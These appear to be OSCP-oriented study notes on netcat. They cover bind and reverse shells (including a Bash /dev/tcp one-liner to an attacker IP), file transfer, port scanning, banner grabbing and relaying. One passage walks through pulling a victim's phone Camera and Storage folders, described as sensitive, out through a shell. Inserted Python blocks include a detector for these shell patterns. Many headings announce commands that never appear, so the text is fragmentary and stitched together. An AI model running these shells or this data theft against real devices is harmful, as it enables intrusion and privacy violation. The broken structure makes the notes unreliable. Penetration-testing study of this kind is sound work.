Netcat

  • Connecting to TCP/UDP Port

We can use client mode to connect to any TCP/UDP port, allowing us to:

  • Check if a port is open or closed.

  • Read a banner from the service listening on a port.

  • Connect to a network service manually.

Netcat

Netcat, first released in 1995(!) by Hobbit, is one of the “original” network penetration testing tools and is so versatile that it lives up to the author’s designation as a hacker’s “Swiss army knife”. The clearest definition of Netcat is from Hobbit himself: a simple “utility which reads and writes data across network connections, using TCP or UDP protocols”.

OK!

On the victim, write this:

On the attacker:

Chatting using nc

nc -nvlp 4444 // on the server

-n stands for "numeric-only", which prevents nc from attempting to resolve hostnames to IP addresses.

-v stands for "verbose", which causes nc to print more detailed output.

-l stands for "listen", which causes nc to listen on the specified port for incoming connections.

-p stands for "port", which specifies the port number to listen on.

nc -nv 10.0.2.10 4444 // on the client, to connect to the server


The netcat tool supports several protocols, but it works mainly over TCP. If you want a different protocol, you must select it with a switch.

-t (TCP) -> To use TCP instead of the default.

-u (UDP) -> To use the UDP protocol.

There are other protocols as well, such as RAW; I will leave it to you to research those.

--

Bind shell

nc -nvlp 4444 -e /bin/bash ⇒ on the victim machine

nc -nv 10.0.2.10 4444 ⇒ on attacker machine to connect with the victim machine

Reverse Shell

nc -nvlp 4444 ⇒ on attacker machine

nc -nv 10.0.2.9 4444 -e /bin/bash ⇒ on victim machine

netcat is a powerful tool often used in the OSCP (Offensive Security Certified Professional) exam for various purposes, such as setting up reverse shells, file transfers, port scanning, and even setting up a simple web server. Here are some common netcat use cases that are particularly relevant for the OSCP:

1. Reverse Shells

A reverse shell is a shell session initiated by the target machine to the attacker's machine. This is often used to bypass firewalls and NAT.

On the Attacker's Machine (Listening):

On the Target Machine (Connecting Back):

For Windows targets:

2. Bind Shells

A bind shell is a shell session where the target machine opens a listening port and waits for an attacker to connect to it.

On the Target Machine (Listening):

For Windows targets:

On the Attacker's Machine (Connecting):

3. File Transfer

netcat can be used to transfer files between the attacker and the target machine.

On the Receiving Machine:

On the Sending Machine:

and use watch to monitor the transfer as it progresses.
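What the receive/send pair above does at the socket level, and why a hash check belongs after it: netcat streams raw bytes and signals end-of-file only by closing the connection, so a dropped connection yields a silently truncated file. The following is an added example, not part of these notes; both ends run locally on 127.0.0.1 and the sample payload is constructed.

```python
"""Netcat-style file transfer over raw TCP with an integrity check.
Added example, not from the original notes: the sample payload below is
constructed, and both ends run locally on 127.0.0.1."""
import hashlib
import socket
import threading

def sha256_of(data: bytes) -> str:
    """Hex SHA-256, the value you would compare with `sha256sum` on both hosts."""
    return hashlib.sha256(data).hexdigest()

def open_listener(port=0):
    """Receiver's `nc -lp PORT` step: bind and listen (port 0 = pick a free one)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    return srv

def receive_file(srv, timeout=5.0):
    """Receiver's `> file` step: accept one connection and read until the
    sender closes. Returns (data, sha256). Like nc, it cannot tell a clean
    EOF from a dropped connection, hence the hash."""
    srv.settimeout(timeout)
    conn, _ = srv.accept()
    chunks = []
    with conn:
        conn.settimeout(timeout)
        while True:
            chunk = conn.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    srv.close()
    data = b"".join(chunks)
    return data, sha256_of(data)

def send_file(host, port, data, timeout=5.0):
    """Sender's `nc HOST PORT < file` step: stream the bytes, then close,
    because closing is the only end-of-file signal the receiver gets."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(data)
    return sha256_of(data)

def transfer(data):
    """Run receiver and sender locally; return (received_bytes, hashes_match)."""
    srv = open_listener()
    port = srv.getsockname()[1]
    result = {}
    def rx():
        result["data"], result["digest"] = receive_file(srv)
    t = threading.Thread(target=rx)
    t.start()
    sent_digest = send_file("127.0.0.1", port, data)
    t.join()
    return result["data"], result["digest"] == sent_digest

# Constructed sample "file", large enough to span many TCP segments.
SAMPLE = b"constructed sample line for the transfer demo\n" * 20000

if __name__ == "__main__":
    received, ok = transfer(SAMPLE)
    print(len(received), "bytes received, hash match:", ok)
```

On real hosts the two sides are different machines: run sha256sum on the source and on the received file and compare, since neither netcat nor this code can distinguish "sender finished" from "connection dropped".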

Advanced: If we want to download a folder that contains a lot of data or information, in reality we will not be able to transfer it the same way.

There are many ways, but I will show just one way using Netcat.

1. Netcat

You compress the folder and then transfer the compressed file, which holds all of the data.

I've turned on Netcat from Termux on my phone and brought up the shell using the methods we learned above. Now let's see the contents of this Camera folder.

It seems to hold a lot of sensitive data.

On the attacker machine, after gaining control via Termux, open a new session using Netcat.

On the same attacker machine, open a new tab and fetch the zip file.

Then unzip it; all the data has simply been brought over in one compressed file.

You can use the same idea on an external path to retrieve as many files and folders as possible from the victim’s device.

-- Such a folder is located inside a main folder named Storage. What if I applied the same idea there?

You will have all this information at your fingertips:

Inside these folders there is a lot of sensitive information and files

4. Port Scanning

netcat can be used to scan for open ports on a target machine.

5. Banner Grabbing

To gather information about services running on open ports.

You can then type something like HEAD / HTTP/1.1 and press Enter twice to get the HTTP headers.
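The three client-mode uses listed at the top of these notes (is the port open, what banner does it send, talk to it by hand) and the banner-grabbing step above, done in Python rather than by hand in nc. This is an added example, not code from the notes: the stand-in services it talks to are constructed so it runs offline, and a real SSH or HTTP service would simply be addressed by host and port instead.

```python
"""Port check and banner grab: the manual `nc -nv HOST PORT` steps above
done in Python. Added example, not from the notes; the stand-in services
below are constructed so it runs offline."""
import socket
import threading

def check_port(host, port, timeout=2.0):
    """True if a TCP connect() succeeds (open); False on refusal or timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def grab_banner(host, port, probe=None, timeout=2.0):
    """Connect, optionally send a probe, and return the first line the
    service sends (decoded), or None if the port is closed or silent.
    Without a probe this is the passive grab (SSH, SMTP, FTP talk first);
    HTTP stays silent until asked, so pass HTTP_HEAD as the probe."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if probe:
                s.sendall(probe)
            data = b""
            while b"\n" not in data and len(data) < 1024:
                chunk = s.recv(1024)
                if not chunk:
                    break
                data += chunk
    except OSError:  # includes socket.timeout for services that say nothing
        return None
    first = data.split(b"\n", 1)[0].strip()
    return first.decode("latin-1") if first else None

# The request the notes type by hand; HTTP/1.1 also requires a Host header.
HTTP_HEAD = b"HEAD / HTTP/1.1\r\nHost: localhost\r\n\r\n"

# ---- constructed stand-ins for real services (test scaffolding only) ------
def serve_once(banner=None, reply=None):
    """One-shot listener on an ephemeral port. `banner` is sent immediately
    (SSH style); `reply` is sent after the client sends something (HTTP
    style). Returns the port number."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    def run():
        conn, _ = srv.accept()
        with conn:
            if banner:
                conn.sendall(banner)
            if reply:
                conn.recv(1024)
                conn.sendall(reply)
        srv.close()
    threading.Thread(target=run, daemon=True).start()
    return port

def closed_port():
    """A port nobody listens on, to show the refused-connection case."""
    tmp = socket.socket()
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port

if __name__ == "__main__":
    p = serve_once(banner=b"SSH-2.0-ExampleSSH_1.0 (constructed)\r\n")
    print("passive banner:", grab_banner("127.0.0.1", p))
    p = serve_once(reply=b"HTTP/1.1 200 OK\r\nServer: constructed\r\n\r\n")
    print("HTTP HEAD reply:", grab_banner("127.0.0.1", p, probe=HTTP_HEAD))
    print("closed port open?", check_port("127.0.0.1", closed_port()))
```

The timeout matters: a firewall that drops packets instead of refusing them makes check_port wait the full timeout before returning False, which is the same pause you see with nc -nv against a filtered port.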

6. Setting Up a Simple Web Server

You can use netcat to serve a single HTTP response.

Simple HTTP Server:

Create a simple HTML file (index.html):

Serve the file with netcat:

7. Port Forwarding

You can forward traffic from one port to another using netcat.

Practical Examples in OSCP

Example 1: Reverse Shell via a Vulnerable Web Application

Assume you have identified a vulnerable web application that allows you to execute commands. You could use the following command to get a reverse shell:

Example 2: Privilege Escalation via File Transfer

You have gained limited access to a target machine and found a privilege escalation exploit that you need to upload. On your machine:

On the target machine:

Example 3: Scanning for Open Ports During Reconnaissance

Use netcat to quickly check for open ports on a target machine:

Example 4: Bind Shell for Post-Exploitation

You have exploited a service and want to maintain access:

On the target machine:

On your machine:

By mastering these netcat commands and understanding how to use them in various scenarios, you can greatly enhance your efficiency and effectiveness during the OSCP exam. Always remember to follow the ethical guidelines and legal boundaries when using these techniques.

Reverse shell without Netcat on the target host

One major downside of the example shown is that you need Netcat on the target host, which is very often not the case in real-world scenarios. In some cases Netcat is present, or we have a way to install it, but in many cases we need alternative ways to connect back to the attack box. Let’s have a look at a few alternative ways to set up a reverse shell.

Bash reverse shell

We can also use Bash to initiate a reverse shell from the target host to the attack box with the following command:

bash -i >& /dev/tcp/192.168.100.113/4444 0>&1
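From the defender's side, the three patterns in these notes (nc listening with -e, nc connecting out with -e, and the Bash /dev/tcp redirection just above) are exactly what a process-listing check should flag, and a plain nc client or listener without -e is the benign chat/banner use from earlier. The following is an added example, not part of the notes: it classifies constructed ps -eo pid,user,args lines, and the nc option names it recognises are those of netcat-traditional and ncat (-e/--exec, -c/--sh-exec, --listen).

```python
"""Detect shell-spawning netcat invocations and the bash /dev/tcp trick
in a process listing. Added defender-side example, not from the notes;
the `ps` output below is constructed, not captured from a real host."""
import re
import shlex

NC_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
# "run this program on connect" options: -e/--exec (netcat-traditional,
# ncat) and -c/--sh-exec (ncat); OpenBSD nc has neither.
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}
DEV_TCP = re.compile(r"/dev/(tcp|udp)/([\w.:-]+)/(\d+)")
SHELLS = {"bash", "sh", "zsh", "ksh"}

def classify(cmdline):
    """Return a finding dict for one command line, or None if nothing to flag."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:            # unbalanced quotes: fall back to a plain split
        argv = cmdline.split()
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]
    if prog in NC_NAMES:
        flags = [a for a in argv[1:] if a.startswith("-")]
        # -l may be bundled with other short options, e.g. -nvlp
        listens = "--listen" in flags or any(
            "l" in f[1:] for f in flags if not f.startswith("--"))
        execs = any(f in EXEC_FLAGS for f in flags)
        if execs:
            return {"kind": "bind_shell" if listens else "reverse_shell", "tool": prog}
        if listens:
            return {"kind": "listener", "tool": prog}
        return None               # plain client use: chat, banner grab, transfer
    m = DEV_TCP.search(cmdline)
    if m and prog in SHELLS:
        return {"kind": "reverse_shell", "tool": "bash-/dev/" + m.group(1),
                "remote": m.group(2) + ":" + m.group(3)}
    return None

def scan_ps(ps_output):
    """Parse `ps -eo pid,user,args`-style text (header line first) and return
    one finding per flagged process, each tagged with its pid and user."""
    findings = []
    for line in ps_output.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        finding = classify(cmd)
        if finding:
            findings.append({"pid": int(pid), "user": user, **finding})
    return findings

# Constructed sample, mirroring the commands used in these notes.
SAMPLE_PS = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 1190 www-data nc -nvlp 4444 -e /bin/bash
 1203 alice    bash -i >& /dev/tcp/192.168.100.113/4444 0>&1
 1220 alice    nc -nv 10.0.2.9 4444 -e /bin/bash
 1231 bob      nc -nvlp 4444
 1240 bob      nc -nv 10.0.2.10 4444
"""

if __name__ == "__main__":
    for finding in scan_ps(SAMPLE_PS):
        print(finding)
```

The bash pattern is only visible this way while the shell is running with the redirection on its command line; a listener with no -e is reported separately and at lower severity, since it is indistinguishable from the chat and file-transfer uses above without looking at what connects to it.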

Advanced Usage (Relay)

We will explain it with a simple example:

We have three devices: A, B and C. Device A cannot see Device C, but Device B can see both Device C and Device A.

So, if Device C sends a command to Device B on port 8080, and Device B can see Device A, you can either send malware that connects back or forward the connection from Device B to Device A.

A -> 192.168.1.2 (Attacker)

B -> 192.168.2.5 (Server)

C -> 192.168.2.3 (Victim)
